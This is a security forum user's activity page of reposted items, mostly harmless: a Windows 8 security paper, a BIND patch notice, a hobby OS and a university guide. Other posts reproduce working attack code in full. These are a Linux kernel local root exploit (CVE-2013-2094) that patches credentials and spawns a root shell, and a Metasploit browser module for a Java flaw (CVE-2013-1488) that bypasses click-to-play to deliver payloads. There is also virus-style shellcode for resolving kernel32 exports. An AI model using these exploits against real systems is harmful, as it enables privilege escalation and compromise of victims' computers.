Jump to content

Nytro

Administrators
 View Profile  See their activity

  • Posts

    18786

  • Joined

  • Last visited

  • Days Won

    738

 Content Type 

Everything posted by Nytro

  1. Nytro
    [h=1]Six months with Windows 8 (white paper)[/h]By Aryeh Goretsky posted 6 Jun 2013 at 09:00AM When Windows 8 first came out, ESET was the first to publish a white paper looking at its security features. In the intervening half-year, we have continued our research, observing how well Windows 8 is doing from a security perspective, as well how it is being adopted by our customers. As a result of continuing research, we have released a new paper, detailing our observations in the first six months. Here are some of the key findings from the first six months with Windows 8: About 3.3% of ESET’s 100M+ customers have adopted Windows 8 (which is a slightly higher adoption rate than most organizations tracking Windows 8 – such as NetApps – have reported, but lower than that of at least one reporter, Valve, which collects data from gamers’ PCs) The replacement of the Start Menu with the Start Screen has generated a whole new ecosystem of Start Menu substitutes. ESET does not treat these programs as malware or PUAs simply because of this functionality, which offer a more traditional interface that many people seem to appreciate. It is important to keep in mind such programs could contain malware, be bundled with potentially unwanted software, or engage in other behavior that causes them to be classified as a threat, unsafe, unwanted or even a suspicious application. No malware was identified in the Windows Store, which now has about 60,000 apps. There have been problems with fake apps in the Windows Store, though, as well as ebook piracy. The current nature of the Windows Store may be hampering Windows 8?s acceptance in BYOD scenarios because of manageability or legal concerns by corporate customers. Windows 8?s Secure UEFI Boot process appears to be intact, with no signs that malware has bypassed it so far. Windows RT comes with a somewhat-hidden copy of Windows Defender app bundled in it. Like its counterpart in Windows 8, Windows Defender provides a base level of security for the operating system. Unlike its counterpart in Windows 8, the Windows RT version it cannot be replaced by another solution. For more information, you can download the white paper directly at Six Months with Windows 8 [PDF, 787KB] or to see all of ESET’s white papers, click on the Papers tab, above. Aryeh Goretsky, MVP, ZCSE Distinguished Researcher Sursa: Six months with Windows 8 (white paper) - We Live Security
  2. Nytro
    [h=2]CONFidence 2013 and the x86 quirks[/h]Another week, another conference. Just a few days ago, Gynvael and I had the pleasure to attend and present at the CONFidence 2013 infosec conference traditionally held in Cracow, Poland. The event requires no further introduction – it has been simply the best Polish conference in the security area since it first started, and this year’s edition was up to the usual high standard – we had some great time, meeting old and making new friends as well as enjoying some of the better talks. With regards to our presentation, we originally intended it to be a gathering of references concerning all of the interesting quirks, undocumented behavior and other amusing facts (directly or indirectly related to the CPU architecture) that we heard or learnt about in both 32 and 64-bit x86 processors during the recent years. If you are closely following the CPU hacking and operating system security scene, you are probably aware of most of the material we presented – still, we hope it proves useful as a thorough reference and possibly motivates you to take a deeper look at some of the areas we discussed during the talk. In addition to what was covered on stage, you can also find several extra “further reading” slides containing references to information which did not fit into the elementary slide deck. Download: Beyond MOV ADD XOR – the unusual and unexpected in x86 (PDF, 5.6MB) Sursa: CONFidence 2013 and the x86 quirks | j00ru//vx tech blog
  3. Nytro
    [h=1]BIND 9 patched against remote crash vuln[/h][h=2]Protection against DoS[/h] By Richard Chirgwin, 11th June 2013 Time to get patching, sys admins: ISC (the Internet Systems Consortium) has issued a fix for a BIND 9 denial of service vulnerability. The defect and patch, published last week, “allows an attacker to crash a BIND 9 recursive resolver with a RUNTIME_CHECK error in resolver.c”, the ISC says in its announcement. CVE-2013-3919 says BIND 9.6-ESV-R9, 9.8.5 and 9.9.3 are affected by the bug. While older versions aren't affected, ISC notes that they're also unsupported and could be carrying other unpatched vulnerabilities. “At the time of this advisory no intentional exploitation of this bug has been observed in the wild. However, the existence of the issue has been disclosed on an open mailing list with enough accompanying detail to reverse engineer an attack and ISC is therefore treating this as a Type II (publicly disclosed) vulnerability, in accordance with our Phased Disclosure Process”, the ISC announcement says. Upgraded versions can be downloaded here. ® Sursa: BIND 9 patched against remote crash vuln • The Register
  4. Nytro
    [h=1][Quick tutorial] Finding Kernel32 Base and walking its export table[/h]by SIGSEGV Hey all , I'll just begin as the title says it all. Only Basic PE-format and assembly knowledge are required. The baby steps of any parasitic PE virus should be Finding the Kernel32 Base in the current process address space , then walking its export table to extract the addresses of all the functions it needs. To find the Kernel base , We'll exploit the fact that the Process Environment Block structure of the current process holds a list of the modules , loaded in the process's address space , in their memory loading order , InMemoryOrderModuleList. In Windows NT , The value at offset 0x30 of the FS segment points to the PEB structure : typedef struct _PEB { BOOLEAN InheritedAddressSpace; BOOLEAN ReadImageFileExecOptions; BOOLEAN BeingDebugged; BOOLEAN Spare; HANDLE Mutant; PVOID ImageBaseAddress; PPEB_LDR_DATA LoaderData; // The rest of the structure is irrelevant to us } PEB, *PPEB; So , we follow the LoaderData pointer , which takes us to another structure , PEB_LDR_DATA : typedef struct _PEB_LDR_DATA { ULONG Length; BOOLEAN Initialized; PVOID SsHandle; LIST_ENTRY InLoadOrderModuleList; LIST_ENTRY InMemoryOrderModuleList; LIST_ENTRY InInitializationOrderModuleList; } PEB_LDR_DATA, *PPEB_LDR_DATA; InMemoryOrderModule is a double linked list and it's what we are interested in , each entry in the list points to an LDR_MODULE structure : typedef struct _LDR_MODULE { LIST_ENTRY InLoadOrderModuleList; LIST_ENTRY InMemoryOrderModuleList; LIST_ENTRY InInitializationOrderModuleList; PVOID BaseAddress; //..... } LDR_MODULE, *PLDR_MODULE; This structure holds the base address of it's module ,, Now , from Windows 2000 and up to windows 7 , The third module loaded in memory will always be that kernel32.dll. Putting all into code : mov ebx, [FS : 0x30] ; PEB mov ebx, [ebx + 0x0C] ; PEB->Ldr mov ebx, [ebx + 0x14] ; PEB->Ldr.InMemoryOrderModuleList.Flink (1st entry) mov ebx, [ebx] ; 2nd Entry mov ebx, [ebx] ; 3rd Entry mov ebx, [ebx + 0x10] ; Third entry's base address (Kernel32.dll) mov [ebp+dwKernelBase] , ebx The following example does the following : Find Kernel32.dll base address Parse it's export tables to locate GetProcAddress Use it to locate LoadLibraryA Use it to Load User32.dll into the current address space Use GetProcAddress to locate MessageBoxA in User32.dll Display a Message box Return to Host. I'm in the middle of my final exams , so I'm afraid I can't explain the example thoroughly , but anyone with basic PE and assembly knowledge should easily grasp it. ; By SIGSEGV [BITS 32] pushad call CodeStart CodeStart: pop ebp sub ebp,CodeStart ; delta offset shit mov ebx, [FS : 0x30] ; get a pointer to the PEB mov ebx, [ebx + 0x0C] ; get PEB->Ldr mov ebx, [ebx + 0x14] ; get PEB->Ldr.InMemoryOrderModuleList.Flink (1st entry) mov ebx, [ebx] ; 2nd Entry mov ebx, [ebx] ; 3rd Entry mov ebx, [ebx + 0x10] ; Get Kernel32 Base mov [ebp+dwKernelBase] , ebx add ebx, [ebx+0x3C] ; Start of PE header mov ebx, [ebx+0x78] ; RVA of export dir add ebx, [ebp+dwKernelBase] ; VA of export dir mov [ebp+dwExportDirectory] , ebx lea edx,[ebp+api_GetProcAddress] mov ecx,[ebp+len_GetProcAddress] call GetFunctionAddress mov [ebp+AGetProcAddressA] , eax lea edx,[ebp+api_LoadLibrary] push edx push dword [ebp+dwKernelBase] call eax mov [ebp+ALoadLibraryA] , eax lea edx , [ebp+szUser32] push edx call eax lea edx , [ebp+api_MessageBoxA] push edx push eax mov ebx,[ebp+AGetProcAddressA] call ebx mov [ebp+AMessageBoxAA] , eax push 0 lea edx,[ebp+szTitle] push edx lea edx,[ebp+szMsg] push edx push 0 call eax popad push 0xBBBBBBBB ;OEP retn ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ; <<<<< GetFunctionAddress >>>>>> ; ; Extracts Function Address From Export Directory and returns it in eax ; ; Parameters : Function name in edx , Length in ecx ; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; GetFunctionAddress: push ebx push esi push edi mov esi, [ebp+dwExportDirectory] mov esi, [esi+0x20] ;RVA of ENT add esi, [ebp+dwKernelBase] ;VA of ENT xor ebx,ebx cld looper: inc ebx lodsd add eax , [ebp+dwKernelBase] ;eax now points to the string of a function push esi ;preserve it for the outer loop mov esi,eax mov edi,edx cld push ecx repe cmpsb pop ecx pop esi jne looper dec ebx mov eax,[ebp+dwExportDirectory] mov eax,[eax+0x24] ;RVA of EOT add eax,[ebp+dwKernelBase] ;VA of EOT movzx eax , word [ebx*2+eax] ;eax now holds the ordinal of our function mov ebx,[ebp+dwExportDirectory] mov ebx,[ebx+0x1C] ;RVA of EAT add ebx,[ebp+dwKernelBase] ;VA of EAT mov ebx,[eax*4+ebx] add ebx,[ebp+dwKernelBase] mov eax,ebx pop edi pop esi pop ebx ret ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ; Data Shit ; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; szTitle: db "Yo !",0 szMsg: db "GreeTz From SIGSEGV",0 szUser32 db "User32.dll",0 AGetProcAddressA: dd 0 api_GetProcAddress: db "GetProcAddress" len_GetProcAddress: dd $-api_GetProcAddress ALoadLibraryA: dd 0 api_LoadLibrary: db "LoadLibraryA",0 AMessageBoxAA: dd 0 api_MessageBoxA: db "MessageBoxA",0 dwKernelBase: dd 0 dwExportDirectory: dd 0 That's it , but I shall post the complete virus source when i get through my exams. Hope you enjoyed this quick tutorial , any feedback is appreciated. Greets , SIGSEGV. Sursa: [Quick tutorial] Finding Kernel32 Base and walking its export table. - rohitab.com - Forums
  5. Nytro
    [h=1]SidonX86 - A simple hobby OS[/h][h=3]by captmicro[/h] I'm new the the forums (though I browse alot) so I figured I'd post some content! This is my hobby OS I've been working on for the past year or so on and off when I have free time, it's still nothing near complete. It doesn't have paging at the moment but I'm reading up about it and attempting to get it working on another OS before I implement it for this. It has memory allocation (blocks only), a text-mode screen library, a minimal c standard library (written by myself, and I have to say it's not the best), a serial port library, and a simple interrupt manager. So far the only applications are a simple terminal, a half-working subleq OISC, and a hex editor (the only really decent app so far) that was ported from my xbox1 hex editor. I'm in the process of writing a transistor design and simulation tool for it, which is something I've really wanted to do for a long time, so expect that soon. One thing that really needs to be done is a disk interface or some sort of in-memory file system so I can load applications without having to compile them into the OS. I've had a go at it once but never tested it (due to not having a file system to load a binary from), so it might just work (see kernel/binldr/elf.c for the code). I have implemented loading apps over a serial port in another OS, but it's probably the WORST idea I ever had. As for the startup screen, don't mind it. This OS was intended to be my entry into low-level TCP/IP stack programming but I haven't gotten that far yet. Once I get a file system working I will probably start on the ethernet card driver and TCP/IP stack. Feel free to do whatever you want with this OS, just please credit me (except the bootloader, I barely wrote any of it). NOTE: you need mingw or some form of gcc, ld, and objcopy to use the build_kernel.bat script. NASM is included in the download splash screen: and the only decent app, the hex editor (it actually has quite a lot of features for a terminal hex editor!): [h=4]Attached Files[/h] likedev.zip 291.33K Sursa: SidonX86 - A simple hobby OS - rohitab.com - Forums
  6. Nytro
    [h=1]Linux kernel perf_swevent_init - Local root Exploit[/h] /* * CVE-2013-2094 exploit x86_64 Linux < 3.8.9 * by sorbo (sorbo@darkircop.org) June 2013 * * Based on sd's exploit. Supports more targets. * */ #define _GNU_SOURCE #include <string.h> #include <stdio.h> #include <unistd.h> #include <stdlib.h> #include <stdint.h> #include <sys/syscall.h> #include <sys/mman.h> #include <linux/perf_event.h> #include <signal.h> #include <assert.h> #define BASE 0x380000000 #define BASE_JUMP 0x1780000000 #define SIZE 0x10000000 #define KSIZE 0x2000000 #define TMP(x) (0xdeadbeef + (x)) struct idt { uint16_t limit; uint64_t addr; } __attribute__((packed)); static int _fd; static int perf_open(uint64_t off) { struct perf_event_attr attr; int rc; // printf("perf open %lx [%d]\n", off, (int) off); memset(&attr, 0, sizeof(attr)); attr.type = PERF_TYPE_SOFTWARE; attr.size = sizeof(attr); attr.config = off; attr.mmap = 1; attr.comm = 1; attr.exclude_kernel = 1; rc = syscall(SYS_perf_event_open, &attr, 0, -1, -1, 0); return rc; } void __sc_start(void); void __sc_next(void); void __sc(void) { asm("__sc_start:\n" "call __sc_next\n" "iretq\n" "__sc_next:\n"); } void sc(void) { int i, j; uint8_t *current = *(uint8_t **)(((uint64_t) &i) & (-8192)); uint64_t kbase = ((uint64_t)current) >> 36; int uid = TMP(1); int gid = TMP(2); for (i = 0; i < 4000; i += 4) { uint64_t *p = (void *) &current[i]; uint32_t *cred = (uint32_t*) p[0]; if ((p[0] != p[1]) || ((p[0]>>36) != kbase)) continue; for (j = 0; j < 20; j++) { if (cred[j] == uid && cred[j + 1] == gid) { for (i = 0; i < 8; i++) { cred[j + i] = 0; return; } } } } } static void sc_replace(uint8_t *sc, uint32_t needle, uint32_t val) { void *p; p = memmem(sc, 900, &needle, sizeof(needle)); if (!p) errx(1, "can't find %x", needle); memcpy(p, &val, sizeof(val)); } static void *map_mem(uint64_t addr) { void *p; p = mmap((void*) addr, SIZE, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED, -1, 0); if (p == MAP_FAILED) err(1, "mmap()"); return p; } static int find_mem(void *mem, uint8_t c) { int i; uint8_t *p = mem; for (i = 0; i < SIZE; i++) { if (p[i] == c) return i; } return -1; } static void dropshell() { if (setuid(0) != 0) errx(1, "failed"); printf("Launching shell\n"); execl("/bin/sh", "sh", NULL); exit(0); } void morte(int x) { printf("Got signal\n"); close(_fd); dropshell(); } static void trigger(int intr) { switch (intr) { case 0: do { int z = 1; int a = 1; z--; a /= z; } while (0); break; case 4: asm("int $4"); break; case 0x80: asm("int $0x80"); break; default: errx(1, "unknown intr %d", intr); } sleep(3); } int main(int argc, char *argv[]) { uint32_t *p[2]; int fd, i; uint64_t off; uint64_t addr = BASE; struct idt idt; uint8_t *kbase; int sz = 4; int intr = 4; printf("Searchin...\n"); p[0] = map_mem(BASE); p[1] = map_mem(BASE_JUMP); memset(p[1], 0x69, SIZE); off = 0xFFFFFFFFL; fd = perf_open(off); close(fd); i = find_mem(p[0], 0xff); if (i == -1) { i = find_mem(p[1], 0x68); if (i == -1) errx(1, "Can't find overwrite"); sz = 24; addr = BASE_JUMP; printf("detected CONFIG_JUMP_LABEL\n"); } munmap(p[0], SIZE); munmap(p[1], SIZE); addr += i; addr -= off * sz; printf("perf_swevent_enabled is at 0x%lx\n", addr); asm("sidt %0" : "=m" (idt)); printf("IDT at 0x%lx\n", idt.addr); off = addr - idt.addr; off -= 8; switch (off % sz) { case 0: intr = 0; break; case 8: intr = 0x80; break; case 16: intr = 4; break; default: errx(1, "remainder %d", off % sz); } printf("Using interrupt %d\n", intr); off -= 16 * intr; assert((off % sz) == 0); off /= sz; off = -off; // printf("Offset %lx\n", off); kbase = (uint8_t*) (idt.addr & 0xFF000000); printf("Shellcode at %p\n", kbase); if (mmap(kbase, KSIZE, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0) == MAP_FAILED) err(1, "mmap()"); memset(kbase, 0x90, KSIZE); kbase += KSIZE - 1024; i = __sc_next - __sc_start; memcpy(kbase, __sc_start, i); kbase += i; memcpy(kbase, sc, 900); sc_replace(kbase, TMP(1), getuid()); sc_replace(kbase, TMP(2), getgid()); signal(SIGALRM, morte); alarm(2); printf("Triggering sploit\n"); _fd = perf_open(off); trigger(intr); exit(0); } Sursa: Linux kernel perf_swevent_init - Local root Exploit
  7. Nytro
    [h=1]Java Applet Driver Manager Privileged toString() Remote Code Execution[/h] ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' require 'rex' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::EXE include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :javascript => false }) def initialize( info = {} ) super( update_info( info, 'Name' => 'Java Applet Driver Manager Privileged toString() Remote Code Execution', 'Description' => %q{ This module abuses the java.sql.DriverManager class where the toString() method is called over user supplied classes, from a doPrivileged block. The vulnerability affects Java version 7u17 and earlier. This exploit bypasses click-to-play on IE throw a specially crafted JNLP file. This bypass is applied mainly to IE, when Java Web Start can be launched automatically throw the ActiveX control. Otherwise the applet is launched without click-to-play bypass. }, 'License' => MSF_LICENSE, 'Author' => [ 'James Forshaw', # Vulnerability discovery and Analysis 'juan vazquez' # Metasploit module ], 'References' => [ [ 'CVE', '2013-1488' ], [ 'OSVDB', '91472' ], [ 'BID', '58504' ], [ 'URL', 'http://www.contextis.com/research/blog/java-pwn2own/' ], [ 'URL', 'http://immunityproducts.blogspot.com/2013/04/yet-another-java-security-warning-bypass.html' ], [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-076/' ] ], 'Platform' => [ 'java', 'win', 'osx', 'linux' ], 'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true }, 'Targets' => [ [ 'Generic (Java Payload)', { 'Platform' => ['java'], 'Arch' => ARCH_JAVA, } ], [ 'Windows x86 (Native Payload)', { 'Platform' => 'win', 'Arch' => ARCH_X86, } ], [ 'Mac OS X x86 (Native Payload)', { 'Platform' => 'osx', 'Arch' => ARCH_X86, } ], [ 'Linux x86 (Native Payload)', { 'Platform' => 'linux', 'Arch' => ARCH_X86, } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jan 10 2013' )) end def setup path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1488", "Exploit.class") @exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) } path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1488", "FakeDriver.class") @driver_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) } path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1488", "FakeDriver2.class") @driver2_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) } path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1488", "META-INF", "services", "java.lang.Object") @object_services = File.open(path, "rb") {|fd| fd.read(fd.stat.size) } path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1488", "META-INF", "services", "java.sql.Driver") @driver_services = File.open(path, "rb") {|fd| fd.read(fd.stat.size) } @exploit_class_name = rand_text_alpha("Exploit".length) @exploit_class.gsub!("Exploit", @exploit_class_name) @jnlp_name = rand_text_alpha(8) super end def jnlp_file jnlp_uri = "#{get_uri}/#{@jnlp_name}.jnlp" jnlp = %Q| <?xml version="1.0" encoding="utf-8"?> <jnlp spec="1.0" xmlns:jfx="http://javafx.com" href="#{jnlp_uri}"> <information> <title>Applet Test JNLP</title> <vendor>#{rand_text_alpha(8)}</vendor> <description>#{rand_text_alpha(8)}</description> <offline-allowed/> </information> <resources> <j2se version="1.7+" href="http://java.sun.com/products/autodl/j2se" /> <jar href="#{rand_text_alpha(8)}.jar" main="true" /> </resources> <applet-desc name="#{rand_text_alpha(8)}" main-class="#{@exploit_class_name}" width="1" height="1"> <param name="__applet_ssv_validated" value="true"></param> </applet-desc> <update check="background"/> </jnlp> | return jnlp end def on_request_uri(cli, request) print_status("handling request for #{request.uri}") case request.uri when /\.jnlp$/i send_response(cli, jnlp_file, { 'Content-Type' => "application/x-java-jnlp-file" }) when /\.jar$/i jar = payload.encoded_jar jar.add_file("#{@exploit_class_name}.class", @exploit_class) jar.add_file("FakeDriver.class", @driver_class) jar.add_file("FakeDriver2.class", @driver2_class) jar.add_file("META-INF/services/java.lang.Object", @object_services) jar.add_file("META-INF/services/java.sql.Driver", @driver_services) metasploit_str = rand_text_alpha("metasploit".length) payload_str = rand_text_alpha("payload".length) jar.entries.each { |entry| entry.name.gsub!("metasploit", metasploit_str) entry.name.gsub!("Payload", payload_str) entry.data = entry.data.gsub("metasploit", metasploit_str) entry.data = entry.data.gsub("Payload", payload_str) } jar.build_manifest send_response(cli, jar, { 'Content-Type' => "application/octet-stream" }) when /\/$/ payload = regenerate_payload(cli) if not payload print_error("Failed to generate the payload.") send_not_found(cli) return end send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' }) else send_redirect(cli, get_resource() + '/', '') end end def generate_html jnlp_uri = "#{get_uri}/#{@jnlp_name}.jnlp" # When the browser is IE, the ActvX is used in order to load the malicious JNLP, allowing click2play bypass # Else an <applet> tag is used to load the malicious applet, this time there isn't click2play bypass html = %Q| <html> <body> <object codebase="http://java.sun.com/update/1.6.0/jinstall-6-windows-i586.cab#Version=6,0,0,0" classid="clsid:5852F5ED-8BF4-11D4-A245-0080C6F74284" height=0 width=0> <param name="app" value="#{jnlp_uri}"> <param name="back" value="true"> <applet archive="#{rand_text_alpha(8)}.jar" code="#{@exploit_class_name}.class" width="1" height="1"></applet> </object> </body> </html> | return html end end Sursa: Java Applet Driver Manager Privileged toString() Remote Code Execution
  8. Nytro
    Burp Suite - Exploiting Lfi With Php://Input Wrapper Description: In this video you will learn how to exploit LFI vulnerability into Remote code execution. For Exploiting LFI vulnerability hood3y using Burp suite and executing a code in PHP://input. Sursa: Burp Suite - Exploiting Lfi With Php://Input Wrapper
  9. Nytro
    Mona.Py : The Exploit Writer's Swiss Army Knife http://www.youtube.com/watch?v=D6dRlePXAhI&feature=player_embedded Description: Complete tutorial on Mona.py's usage. Kerala Cyber Force Ajin Abraham Sursa: Mona.Py : The Exploit Writer's Swiss Army Knife
  10. Nytro
    Kali Linux - Create A Hidden Truecrypt Volume http://www.youtube.com/watch?v=I4vMM0M8vI0&feature=player_embedded Description: Five Simple Rules for Your Work Computer 1.) Don't Contaminate. 2.) BIOS and Bootloader Protection. 3.) Don't use Hibernate or Sleep. 3.) Use Full Disk Encryption. 4.) Use TrueCrypt - Hidden Container. 5.) Use Tails if you require privacy. Sursa: Kali Linux - Create A Hidden Truecrypt Volume
  11. Nytro
    Sql Injection Conrad Reynolds Description: In this video Conrad Reynolds talk about Advanced SQL injection. He will target vulnerable os called Mutillidae and performing all the attack on it. This is very good presentation for beginners and advanced users. Sursa: Sql Injection Conrad Reynolds
  12. Nytro
    Safeseh Bypass - Seh Buffer Overflow Win7- 64bits http://www.youtube.com/watch?v=2CGbejqG-QM&feature=player_embedded Description: In this video you will learn how to perform a SEH Buffer Overflow on Windows 7 64bit so In this video actually Mariotrey exploiting an IDM software (Internet Download Manager - SafeSEH Bypass). 1337day Inj3ct0r Exploit Database : vulnerability : 0day : shellcode by Inj3ct0r Team Sursa: Safeseh Bypass - Seh Buffer Overflow Win7- 64bits
  13. Nytro
    Tot vine bacul si lumea incearca sa decida la ce facultate sa ajunga, vreau sa aducem cateva lamuriri si sa speram ca vor face alegerea corecta. Vreau ca cei care sunt la diverse facultati de informatica sa isi descrie facultatea, cu bune si cu rele, sa nu faca si altii aceeasi greseala ca ei. Fiind in Bucuresti, trebuie sa spun ca sunt 4 facultati: 1. ASE - Cibernetica 2. Universitatea Bucuresti - Informatica 3. Politehnica Bucuresti - Automatica si calculatoare 4. Academia Tehnica Militara - ? Ordinea este practic in functie de gradul de dificultate: cel mai usor, lejer, ar fi la ASE, iar cel mai dificil, din punct de vedere al cursurilor, prezentelor cerute, numarului de ore dar si de ani, ar fi Politehnica. Vreau sa precizez si Academia Tehnica Militara, unde am dat si eu, am luat probele fizice (la MApN sunt grele iar la STS lejere) dar examenul scris este la matematica si fizica si este al dracu de nasol, mult mai nasol decat la Poli. Oricum sunt fericit ca nu am nimerit acolo, cunosc destule persoane care au plecat de acolo pentru ca "nu se merita", cand iesi din facultate semnezi contract pe 10 ani... In fine, daca exista persoane interesate, poate fi ok, va puteti interesa sau poate va pot raspunde la unele intrebari. Cum sunt student la Universitatea Bucuresti - Informatica, va voi spune in detaliu parerea mea despre aceasta facultate. Astept in special oameni de la Poli sa o descrie... Admiterea: Incepem cu inceputul. Cand am dat eu, si probabil si acum si peste 1000 de ani, admiterea consta intr-un examen scris astfel: 1. Subiect de informatica, o problema de programare (sau mai multe), mai degraba algoritmica, nu foarte dificila, care trebuia rezolvata (nu mai stiu daca in C/Pascal sau pseudocod) 2. Subiect de matematica, la alegere dintre: analiza, algebra si geometrie - PORCARIE! Media se calcula intre cele 2 subiecte. Nu stiu daca conta media de la bac sau alte porcarii, va interesati si voi. Eu am plecat pe ideea ca fac la cel de info, nu fac la cel de mate, dar media e ok. Si se intra usor: erau 180 de locuri, eu eram spre final (initial) cu media 7.50, cam asa, dar dupa redistribuiri (dupa ce isi retrag dosarul cei care au dat mai multe facultati si intra la o alta facultate) s-a intrat cu 5.01, adica a intrat cred ca toata lumea care a avut medie de trecere (trebuie sa luati minim 5). Aspectul facultatii: Poate sunt si persoane interesate de aceste aspecte stupide, dar care uneori conteaza, asa ca va spun pe scurt: nu e tocmai Hotel Intercontinental. Mai exact, bancile sunt de lemn, normale, 3 amfiteatre, la parter si la cele 3 etaje, cu proiector, majoritatea cursurilor fiind proiectate sau scrise pe tabla. Iarna e posibil sa aveti probleme cu frigul, nu prea am mai fost eu pe la facultate dar aveam colegi care stiu ca se plangeau ca iarna nu prea e caldura si ca stau cu gecile pe ei, dar nu cred ca e mereu asa. Laboratoare sunt cateva, calculatoarele sunt ok, nu va asteptati la cine stie ce, dar nici nu aveti nevoie, nu mergeti acolo sa va jucati, daca va merge Visual Studio nu aveti nevoie de mai mult. Recent a fost creat si un laborator cu 6 MAC-uri si 6 iPhone-uri pentru dezvoltarea de aplicatii, prin nu stiu ce afacere dubioasa cu firma unuia. Anul I - Semestrul I: - Analiza - MATEMATICA - Algebra - MATEMATICA - Logica matematica si computationala - MATEMATICA - Algoritmi si structuri de date - Se predau algoritmi de tot felul, sortari: bubble, interclasare, quick, mi se pare foarte util si ar trebui sa mergeti la el - Programare procedurala - Se preda limbajul C. Nu plecati de la ideea ca "eu stiu C" ca o sa va luati singur la palme cand o sa vedeti ca nu cunoasteti unele chestii de baza - Mergeti, e important! - Arhitectura sistemelor de calcul - Initial mi se paruse o prostie, dar e foarte interesant, e despre cum functioneaza un procesor, cum se implementeaza o adunare, o inmultire prin circuite, imi pare rau ca nu am prea fost. In plus, proful, Atanasiu, e genial. Sa nu mai pomenesc de laboratorul de Assemnbler... Anul I - Semestrul II: - Analiza II - MATEMATICA - Algebra II - MATEMATICA - Geometrie - MATEMATICA - Limbaje formale si automate - Nu prea va pot spune cu ce este aceasta materie, dar contine cateva lucruri interesante despre automate (deterministe, nedeterministe), gramatici si alte lucruri care veti vedea ca se folosesc la proiectarea compilatoarelor. Unele chestii interesante, poate fi util - Algoritmica grafurilor - Dupa cum spune si numele, algoritmi pe grafuri, poate fi util pentru tot felul de aplicatii de "maps", calculare de rute si mai stiu eu ce - Programare orientata pe obiecte - Poate cel mai important curs, cel putin pentru mine, se face C++ la un nivel mai "hardcore" cu toate detaliile de riguare. Examenul nu e usor (am luat cea mai mare nota din facultate la scris, la marire, sa ma laud ) Anul II - Semestrul I: - Probabilitati - MATEMATICA - Calculabilitate si complexitate - Poate parea sa aiba legatura cu complexitatea algoritmilor, cam despre asta e, dar nu stiu exact despre ce e vorba, mi s-a parut cam prea "matematic" (ca majoritatea cursurilor, o sa observati ca se face multa teorie si mai putina practica) - Geometrie computationala - Matematica, dar cu aplicatii in industria jocurilor, cred ca aveti nevoie de astfel de lucruri daca vreti sa faceti jocuri 3D. O singura notiune mi-a ramas in minte: Curbe Bezier. Dar tot multa matematica este - Tehnici Web - Se invata HTML, CSS si JavaScript, e util, nu e deloc greu, desi la examen s-ar putea sa vi se para ciudat sa puneti diverse lucruri sa se miste de colo-colo pe ecran - Sisteme de operare - Foarte smecher, Linux si in principal programarea in C sub Linux: semafoare, shared memory, foarte multe lucruri interesante, cel putin pentru mine - Tehnici avansate de programare - Se invata limbajul Java si algoritmica: greedy, backtracking... Lucruri pe care nu strica sa le cunosti Anul II - Semestrul II: - Statistica - MATEMATICA, dar profa e draguta, mergeti la cel putin un curs - Programare logica - AL DOILEA CEL MAI DE CACAT LUCRU DIN VIATA VOASTRA (vezi anul III). NU are nicio legatura cu "programarea". E o matematica nasoala, iar semene ciudate pe care le-ati invatat in liceu o sa fie mici copii pe langa porcariile de aici. Proful de cacat e CAZANESCU, daca aveti noroc poate faceti cu alta profa - Inteligenta artificiala - Numele spune totul, dar nu prea mi-a placut modul in care s-a predat, profa nu parea deloc interesata si nu atragea lumea. Se pot invata (cred) cateva lucruri utile. - Metode de dezvolare software - Nu prea venea lumea pe la cursuri, contine lucruri despre UML si alte astfel de lucruri, mi-a placut ca era un capitol despre threaduri (pthreads) si nu mai stiu ce mecanism de comunicatie inter-procese. - Baze de date - Baze de date Oracle, foarte util, notiuni avansate, query-uri lungi si frumoase - Retele de calculatoare - Nu se predau protocoale de comunicatie, TCP/IP, ci se face Java, dar se fac 3 chestii interesante: Sockets, RMI si Servlets. Anul III - Semestrul I: - Ecuatii diferentiale si derivate partiale - MATEMATICA, daca nu v-au placut integralele in liceu, o sa aveti viata grea, sunt chestii nasoale - Tehnici de simulare - Poate parea util, dar e o porcarie, tot MATEMATICA este - Programare declarativa - CEL MAI DE CACAT LUCRU DIN VIATA VOASTRA - Acelasi domn Cazanescu o sa aibe grija sa va faca viata un chin: pe langa faptul ca e un JEG de materie, ala cica nici nu vrea sa copiati, vezi domne vrea sa ii inveti, cand el trebuia sa se pensioneze de cativa ani - Dezvoltarea aplicatiilor web - Se face ASP.NET, mi s-a parut interesant si poate util - Sisteme de gestiune a bazelor de date - Se face Oracle PL/SQL, invatati notiuni interesante si utile: cursoare, triggeri, functii pentru baze de date Anul III - Semestrul II: - Calcul numeric - MATEMATICA, nu stiu exact care e logica sa dar profu e de treaba - Tehnici de optimizare - MATEMATICA, poate parea util, ca cica optimizezi, ca gasesti solutii, dar e vorba doar de reolvarea unor sisteme nasoale - Tehnici de compilare - Am invatat cate ceva si sunt cateva lucruri interesante: gramatici, transformarea unei expresii regulate intr-un automat, automate pushdown... Nu ar strica sa aruncati o privire - Criptografie si securitate - Numele spune tot, nu e nevoie sa va oblig sa mergeti la cursuri, nu sunt asa 